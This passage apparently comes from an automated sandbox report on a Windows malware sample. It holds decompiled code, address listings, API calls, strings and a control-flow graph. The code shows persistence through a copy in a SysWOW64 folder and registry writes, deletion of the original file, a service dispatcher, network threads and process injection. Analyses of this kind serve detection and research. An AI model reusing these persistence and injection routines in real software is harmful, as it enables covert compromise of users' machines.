											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t438 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t438 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8));
														E0040EE2A(_v40, _t459, 0, _t454);
														_t469 = _t469 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
												E0040EE2A(_t438, _t459, 0, _t454);
												_t469 = _t469 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E004096FF(_t438);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E00406DC2(_t438) ^ 0x5e5e5e5e);
									E0040F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E00406CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0041070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E00409326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x41217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x412180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x5e0d0108;
												 *0x412180 = 0x5e0d0108;
												 *0x41217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E004096FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0040ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0040EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0040ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0040EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}





















































































                                                                                                                                  0x00409a7f
                                                                                                                                  0x00409a83
                                                                                                                                  0x00409a8a
                                                                                                                                  0x00409a90
                                                                                                                                  0x00409a97
                                                                                                                                  0x00409a9d
                                                                                                                                  0x0040a3cc
                                                                                                                                  0x0040a3d2
                                                                                                                                  0x0040a41c
                                                                                                                                  0x0040a42c
                                                                                                                                  0x0040a43a
                                                                                                                                  0x0040a440
                                                                                                                                  0x0040a448
                                                                                                                                  0x0040a452
                                                                                                                                  0x0040a45a
                                                                                                                                  0x0040a469
                                                                                                                                  0x0040a46b
                                                                                                                                  0x0040a470
                                                                                                                                  0x0040a475
                                                                                                                                  0x0040a47a
                                                                                                                                  0x0040a48a
                                                                                                                                  0x0040a48c
                                                                                                                                  0x0040a497
                                                                                                                                  0x0040a497
                                                                                                                                  0x0040a49d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a49f
                                                                                                                                  0x0040a4a7
                                                                                                                                  0x0040a4ac
                                                                                                                                  0x0040a4be
                                                                                                                                  0x0040a4c3
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a4c3
                                                                                                                                  0x0040a4ae
                                                                                                                                  0x0040a4ae
                                                                                                                                  0x0040a4b3
                                                                                                                                  0x0040a4b5
                                                                                                                                  0x0040a4b9
                                                                                                                                  0x0040a4b9
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a4b5
                                                                                                                                  0x0040a497
                                                                                                                                  0x0040a3da
                                                                                                                                  0x0040a406
                                                                                                                                  0x0040a407
                                                                                                                                  0x0040a409
                                                                                                                                  0x0040a40b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a3e8
                                                                                                                                  0x0040a3eb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a3ed
                                                                                                                                  0x0040a3f3
                                                                                                                                  0x0040a3f6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a3f8
                                                                                                                                  0x0040a3f8
                                                                                                                                  0x0040a3f8
                                                                                                                                  0x0040a400
                                                                                                                                  0x0040a400
                                                                                                                                  0x0040a414
                                                                                                                                  0x0040a419
                                                                                                                                  0x00000000
                                                                                                                                  0x00409aa3
                                                                                                                                  0x00409ab0
                                                                                                                                  0x00409ac2
                                                                                                                                  0x00409ac4
                                                                                                                                  0x00409ac4
                                                                                                                                  0x00409ad1
                                                                                                                                  0x00409ae1
                                                                                                                                  0x00409aef
                                                                                                                                  0x00409af4
                                                                                                                                  0x00409af9
                                                                                                                                  0x00409afb
                                                                                                                                  0x00409afb
                                                                                                                                  0x00409af9
                                                                                                                                  0x00409afd
                                                                                                                                  0x00409b14
                                                                                                                                  0x00409b1a
                                                                                                                                  0x00409b26
                                                                                                                                  0x00409b2b
                                                                                                                                  0x00409b33
                                                                                                                                  0x00409b36
                                                                                                                                  0x00409b3b
                                                                                                                                  0x00409b41
                                                                                                                                  0x00409c26
                                                                                                                                  0x00409c2b
                                                                                                                                  0x00409c2e
                                                                                                                                  0x00409c33
                                                                                                                                  0x0040a1de
                                                                                                                                  0x0040a1e4
                                                                                                                                  0x0040a1fd
                                                                                                                                  0x0040a211
                                                                                                                                  0x0040a214
                                                                                                                                  0x0040a219
                                                                                                                                  0x0040a21c
                                                                                                                                  0x0040a21f
                                                                                                                                  0x0040a2e2
                                                                                                                                  0x0040a305
                                                                                                                                  0x0040a308
                                                                                                                                  0x0040a30d
                                                                                                                                  0x0040a310
                                                                                                                                  0x0040a313
                                                                                                                                  0x0040a35a
                                                                                                                                  0x0040a35a
                                                                                                                                  0x0040a35f
                                                                                                                                  0x0040a361
                                                                                                                                  0x0040a3c2
                                                                                                                                  0x00409c05
                                                                                                                                  0x00409c06
                                                                                                                                  0x00409c06
                                                                                                                                  0x0040a363
                                                                                                                                  0x0040a369
                                                                                                                                  0x0040a397
                                                                                                                                  0x0040a397
                                                                                                                                  0x0040a39d
                                                                                                                                  0x0040a3a3
                                                                                                                                  0x0040a3aa
                                                                                                                                  0x0040a3b1
                                                                                                                                  0x0040a3b4
                                                                                                                                  0x0040a3b7
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a3b7
                                                                                                                                  0x0040a36b
                                                                                                                                  0x0040a371
                                                                                                                                  0x0040a374
                                                                                                                                  0x0040a374
                                                                                                                                  0x0040a376
                                                                                                                                  0x0040a377
                                                                                                                                  0x0040a377
                                                                                                                                  0x0040a37d
                                                                                                                                  0x0040a380
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a38e
                                                                                                                                  0x0040a394
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a394
                                                                                                                                  0x0040a318
                                                                                                                                  0x0040a31e
                                                                                                                                  0x0040a324
                                                                                                                                  0x0040a325
                                                                                                                                  0x0040a327
                                                                                                                                  0x0040a339
                                                                                                                                  0x0040a33b
                                                                                                                                  0x0040a33d
                                                                                                                                  0x0040a340
                                                                                                                                  0x0040a344
                                                                                                                                  0x0040a344
                                                                                                                                  0x0040a34c
                                                                                                                                  0x0040a351
                                                                                                                                  0x0040a354
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a354
                                                                                                                                  0x0040a329
                                                                                                                                  0x0040a32b
                                                                                                                                  0x0040a32e
                                                                                                                                  0x0040a32e
                                                                                                                                  0x0040a330
                                                                                                                                  0x0040a331
                                                                                                                                  0x0040a331
                                                                                                                                  0x0040a337
                                                                                                                                  0x0040a337
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a337
                                                                                                                                  0x0040a228
                                                                                                                                  0x0040a22b
                                                                                                                                  0x0040a231
                                                                                                                                  0x0040a234
                                                                                                                                  0x0040a237
                                                                                                                                  0x0040a27a
                                                                                                                                  0x0040a280
                                                                                                                                  0x0040a281
                                                                                                                                  0x0040a283
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a28e
                                                                                                                                  0x0040a291
                                                                                                                                  0x0040a294
                                                                                                                                  0x0040a297
                                                                                                                                  0x0040a2a5
                                                                                                                                  0x0040a2ad
                                                                                                                                  0x0040a2b4
                                                                                                                                  0x0040a2b4
                                                                                                                                  0x0040a2b7
                                                                                                                                  0x0040a2b7
                                                                                                                                  0x0040a2bd
                                                                                                                                  0x0040a2d0
                                                                                                                                  0x0040a2d5
                                                                                                                                  0x0040a2d5
                                                                                                                                  0x0040a2d8
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a2d8
                                                                                                                                  0x0040a242
                                                                                                                                  0x0040a245
                                                                                                                                  0x0040a24b
                                                                                                                                  0x0040a24c
                                                                                                                                  0x0040a24e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a253
                                                                                                                                  0x0040a264
                                                                                                                                  0x0040a26c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a26c
                                                                                                                                  0x00409c39
                                                                                                                                  0x00409c3f
                                                                                                                                  0x0040a167
                                                                                                                                  0x0040a183
                                                                                                                                  0x0040a190
                                                                                                                                  0x0040a196
                                                                                                                                  0x0040a198
                                                                                                                                  0x0040a198
                                                                                                                                  0x0040a1a2
                                                                                                                                  0x0040a1b3
                                                                                                                                  0x0040a1b6
                                                                                                                                  0x0040a1bc
                                                                                                                                  0x0040a1bf
                                                                                                                                  0x0040a1c7
                                                                                                                                  0x0040a1cc
                                                                                                                                  0x0040a1cc
                                                                                                                                  0x0040a1bf
                                                                                                                                  0x0040a1a2
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c54
                                                                                                                                  0x00409c56
                                                                                                                                  0x00409c5b
                                                                                                                                  0x00409c62
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c74
                                                                                                                                  0x00409c79
                                                                                                                                  0x00409c7c
                                                                                                                                  0x00409c81
                                                                                                                                  0x00000000
                                                                                                                                  0x00409c90
                                                                                                                                  0x00409c94
                                                                                                                                  0x00409c97
                                                                                                                                  0x00409c9a
                                                                                                                                  0x00409e3e
                                                                                                                                  0x00409e3e
                                                                                                                                  0x00409e42
                                                                                                                                  0x0040a155
                                                                                                                                  0x0040a158
                                                                                                                                  0x0040a15d
                                                                                                                                  0x0040a161
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a161
                                                                                                                                  0x00409e66
                                                                                                                                  0x00409e6b
                                                                                                                                  0x00409e75
                                                                                                                                  0x00409e77
                                                                                                                                  0x0040a14a
                                                                                                                                  0x0040a14d
                                                                                                                                  0x0040a152
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a152
                                                                                                                                  0x00409e98
                                                                                                                                  0x00409e9d
                                                                                                                                  0x00409ea0
                                                                                                                                  0x00409ea2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409eab
                                                                                                                                  0x00409eb0
                                                                                                                                  0x00409ec1
                                                                                                                                  0x00409ec8
                                                                                                                                  0x00409ed5
                                                                                                                                  0x00409edb
                                                                                                                                  0x00409ee3
                                                                                                                                  0x00409ee4
                                                                                                                                  0x00409ee8
                                                                                                                                  0x00409eeb
                                                                                                                                  0x00409ef2
                                                                                                                                  0x00409ef9
                                                                                                                                  0x00409efc
                                                                                                                                  0x00409efd
                                                                                                                                  0x00409f03
                                                                                                                                  0x00409f03
                                                                                                                                  0x00409f08
                                                                                                                                  0x00409f09
                                                                                                                                  0x00409f0e
                                                                                                                                  0x00409f11
                                                                                                                                  0x00409f2d
                                                                                                                                  0x00409f32
                                                                                                                                  0x00409f3b
                                                                                                                                  0x00409f41
                                                                                                                                  0x00409f44
                                                                                                                                  0x00409f46
                                                                                                                                  0x00409f4b
                                                                                                                                  0x00409f4b
                                                                                                                                  0x00409f67
                                                                                                                                  0x00409f6a
                                                                                                                                  0x00409f6a
                                                                                                                                  0x00409f73
                                                                                                                                  0x00409f82
                                                                                                                                  0x00409f8e
                                                                                                                                  0x00409f98
                                                                                                                                  0x00409f9d
                                                                                                                                  0x00409fb4
                                                                                                                                  0x00409fba
                                                                                                                                  0x00409fbc
                                                                                                                                  0x00409fc2
                                                                                                                                  0x00409fc9
                                                                                                                                  0x00409fcf
                                                                                                                                  0x00409fd2
                                                                                                                                  0x00409fd4
                                                                                                                                  0x00409fda
                                                                                                                                  0x00409fda
                                                                                                                                  0x00409fdd
                                                                                                                                  0x00409fe1
                                                                                                                                  0x00409fe7
                                                                                                                                  0x00409feb
                                                                                                                                  0x00409ff1
                                                                                                                                  0x00409ff4
                                                                                                                                  0x00409ff8
                                                                                                                                  0x00409ffb
                                                                                                                                  0x00409ffe
                                                                                                                                  0x0040a004
                                                                                                                                  0x0040a007
                                                                                                                                  0x0040a010
                                                                                                                                  0x0040a025
                                                                                                                                  0x0040a038
                                                                                                                                  0x0040a041
                                                                                                                                  0x0040a046
                                                                                                                                  0x0040a049
                                                                                                                                  0x0040a050
                                                                                                                                  0x0040a05e
                                                                                                                                  0x0040a05e
                                                                                                                                  0x0040a072
                                                                                                                                  0x0040a078
                                                                                                                                  0x0040a07f
                                                                                                                                  0x0040a08d
                                                                                                                                  0x0040a08d
                                                                                                                                  0x0040a093
                                                                                                                                  0x0040a093
                                                                                                                                  0x0040a007
                                                                                                                                  0x00409feb
                                                                                                                                  0x00409fe1
                                                                                                                                  0x0040a09a
                                                                                                                                  0x0040a09d
                                                                                                                                  0x0040a09f
                                                                                                                                  0x0040a0a2
                                                                                                                                  0x0040a0b6
                                                                                                                                  0x0040a0de
                                                                                                                                  0x0040a0e7
                                                                                                                                  0x0040a0ec
                                                                                                                                  0x0040a0fd
                                                                                                                                  0x0040a0fd
                                                                                                                                  0x0040a0a2
                                                                                                                                  0x0040a120
                                                                                                                                  0x0040a126
                                                                                                                                  0x0040a128
                                                                                                                                  0x0040a131
                                                                                                                                  0x0040a137
                                                                                                                                  0x0040a137
                                                                                                                                  0x0040a13a
                                                                                                                                  0x0040a13e
                                                                                                                                  0x0040a140
                                                                                                                                  0x0040a143
                                                                                                                                  0x0040a145
                                                                                                                                  0x0040a145
                                                                                                                                  0x0040a143
                                                                                                                                  0x00000000
                                                                                                                                  0x0040a13e
                                                                                                                                  0x00409ef4
                                                                                                                                  0x00409ef7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409ef7
                                                                                                                                  0x00409cac
                                                                                                                                  0x00409cb2
                                                                                                                                  0x00409cb4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409cd5
                                                                                                                                  0x00409cda
                                                                                                                                  0x00409cdf
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409ce9
                                                                                                                                  0x00409cec
                                                                                                                                  0x00409d58
                                                                                                                                  0x00409d59
                                                                                                                                  0x00409d64
                                                                                                                                  0x00409d65
                                                                                                                                  0x00409d6a
                                                                                                                                  0x00409d7a
                                                                                                                                  0x00409d8b
                                                                                                                                  0x00409d9d
                                                                                                                                  0x00409da3
                                                                                                                                  0x00409da3
                                                                                                                                  0x00000000
                                                                                                                                  0x00409cf6
                                                                                                                                  0x00409cf6
                                                                                                                                  0x00409cfc
                                                                                                                                  0x00409cff
                                                                                                                                  0x00409cff
                                                                                                                                  0x00409d01
                                                                                                                                  0x00409d02
                                                                                                                                  0x00409d06
                                                                                                                                  0x00409d0a
                                                                                                                                  0x00409d16
                                                                                                                                  0x00409d16
                                                                                                                                  0x00409d17
                                                                                                                                  0x00409d1b
                                                                                                                                  0x00409d2f
                                                                                                                                  0x00409d2f
                                                                                                                                  0x00409d3e
                                                                                                                                  0x00409d41
                                                                                                                                  0x00409d49
                                                                                                                                  0x00409d4f
                                                                                                                                  0x00409d52
                                                                                                                                  0x00409da5
                                                                                                                                  0x00409da8
                                                                                                                                  0x00409db6
                                                                                                                                  0x00409db6
                                                                                                                                  0x00409db0
                                                                                                                                  0x00409db0
                                                                                                                                  0x00409db0
                                                                                                                                  0x00409db7
                                                                                                                                  0x00409db8
                                                                                                                                  0x00409dbf
                                                                                                                                  0x00409dc3
                                                                                                                                  0x00409dca
                                                                                                                                  0x00409dd1
                                                                                                                                  0x00409dd2
                                                                                                                                  0x00409dd7
                                                                                                                                  0x00409ddc
                                                                                                                                  0x00409e21
                                                                                                                                  0x00409e26
                                                                                                                                  0x00409e29
                                                                                                                                  0x00000000
                                                                                                                                  0x00409dde
                                                                                                                                  0x00409df5
                                                                                                                                  0x00409e0c
                                                                                                                                  0x00409e11
                                                                                                                                  0x00409e16
                                                                                                                                  0x00409e1c
                                                                                                                                  0x00409e2e
                                                                                                                                  0x00409e2e
                                                                                                                                  0x00409e38
                                                                                                                                  0x00000000
                                                                                                                                  0x00409e38
                                                                                                                                  0x00409df9
                                                                                                                                  0x00409dfd
                                                                                                                                  0x00409dff
                                                                                                                                  0x00409dff
                                                                                                                                  0x00409e04
                                                                                                                                  0x00000000
                                                                                                                                  0x00409e04
                                                                                                                                  0x00409d1d
                                                                                                                                  0x00409d1d
                                                                                                                                  0x00409d23
                                                                                                                                  0x00409d2a
                                                                                                                                  0x00409d2d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409d2d
                                                                                                                                  0x00000000
                                                                                                                                  0x00409d23
                                                                                                                                  0x00409d1b
                                                                                                                                  0x00409cec
                                                                                                                                  0x00409c81
                                                                                                                                  0x00409c3f
                                                                                                                                  0x00409b47
                                                                                                                                  0x00409b4a
                                                                                                                                  0x00409b4d
                                                                                                                                  0x00409b56
                                                                                                                                  0x00409b8b
                                                                                                                                  0x00409b91
                                                                                                                                  0x00409b92
                                                                                                                                  0x00409b94
                                                                                                                                  0x00409b9f
                                                                                                                                  0x00409b9f
                                                                                                                                  0x00409b9f
                                                                                                                                  0x00409ba4
                                                                                                                                  0x00409ba4
                                                                                                                                  0x00409bb3
                                                                                                                                  0x00409bb8
                                                                                                                                  0x00409bbf
                                                                                                                                  0x00409bbf
                                                                                                                                  0x00409bc2
                                                                                                                                  0x00409bc8
                                                                                                                                  0x00409bde
                                                                                                                                  0x00409be3
                                                                                                                                  0x00409be8
                                                                                                                                  0x00409bfa
                                                                                                                                  0x00409bff
                                                                                                                                  0x00409c02
                                                                                                                                  0x00409c02
                                                                                                                                  0x00409be8
                                                                                                                                  0x00000000
                                                                                                                                  0x00409bc8
                                                                                                                                  0x00409b58
                                                                                                                                  0x00409b5e
                                                                                                                                  0x00409b64
                                                                                                                                  0x00409b67
                                                                                                                                  0x00000000
                                                                                                                                  0x00409b69
                                                                                                                                  0x00409b6b
                                                                                                                                  0x00409b7a
                                                                                                                                  0x00409b7f
                                                                                                                                  0x00000000
                                                                                                                                  0x00409b7f
                                                                                                                                  0x00409b67

                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
                                                                                                                                  • SetErrorMode.KERNELBASE(00000003), ref: 00409A83
                                                                                                                                  • SetUnhandledExceptionFilter.KERNELBASE(00406511), ref: 00409A8A
                                                                                                                                    • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                                                                    • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                                                                    • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 00409AFD
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00409B99
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00409C06
                                                                                                                                  • GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00409D8B
                                                                                                                                  • lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
                                                                                                                                  • DeleteFileA.KERNEL32(00000022), ref: 00409E38
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
                                                                                                                                  • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
                                                                                                                                  • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
                                                                                                                                  • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
                                                                                                                                  • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
                                                                                                                                  • wsprintfA.USER32 ref: 0040A0B6
                                                                                                                                  • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
                                                                                                                                  • lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
                                                                                                                                  • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
                                                                                                                                  • GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0040A1E5
                                                                                                                                    • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,004122F8,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                                                                    • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                                                                    • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040A288
                                                                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                                                                  • DeleteFileA.KERNEL32(C:\Users\user\Desktop\OcmKX57vR7.exe), ref: 0040A407
                                                                                                                                  • CreateThread.KERNEL32 ref: 0040A42C
                                                                                                                                  • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                                                                  • CreateThread.KERNEL32 ref: 0040A469
                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                                                                  • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                                                                  • String ID: "$"$"$%X%08X$0 v$C:\Users\user\Desktop\OcmKX57vR7.exe$C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$D$P$\$ghrubsm
                                                                                                                                  • API String ID: 2089075347-714065992
                                                                                                                                  • Opcode ID: 360b2b07d4ffeb50b92e0b027d8e20f7002dac9485d7fa8cd2f9e6a30bb22cad
                                                                                                                                  • Instruction ID: 03c383f258a4670438db1d87b8f5ad655fb57d32e75deaea02eb898f73f6b462
                                                                                                                                  • Opcode Fuzzy Hash: 360b2b07d4ffeb50b92e0b027d8e20f7002dac9485d7fa8cd2f9e6a30bb22cad
                                                                                                                                  • Instruction Fuzzy Hash: EC5291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040637C Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 440 40637c-406384 441 406386-406389 440->441 442 40638a-4063b4 GetModuleHandleA VirtualAlloc 440->442 443 4063f5-4063f7 442->443 444 4063b6-4063d4 call 40ee08 VirtualAllocEx 442->444 445 40640b-40640f 443->445 444->443 448 4063d6-4063f3 call 4062b7 WriteProcessMemory 444->448 448->443 451 4063f9-40640a 448->451 451->445
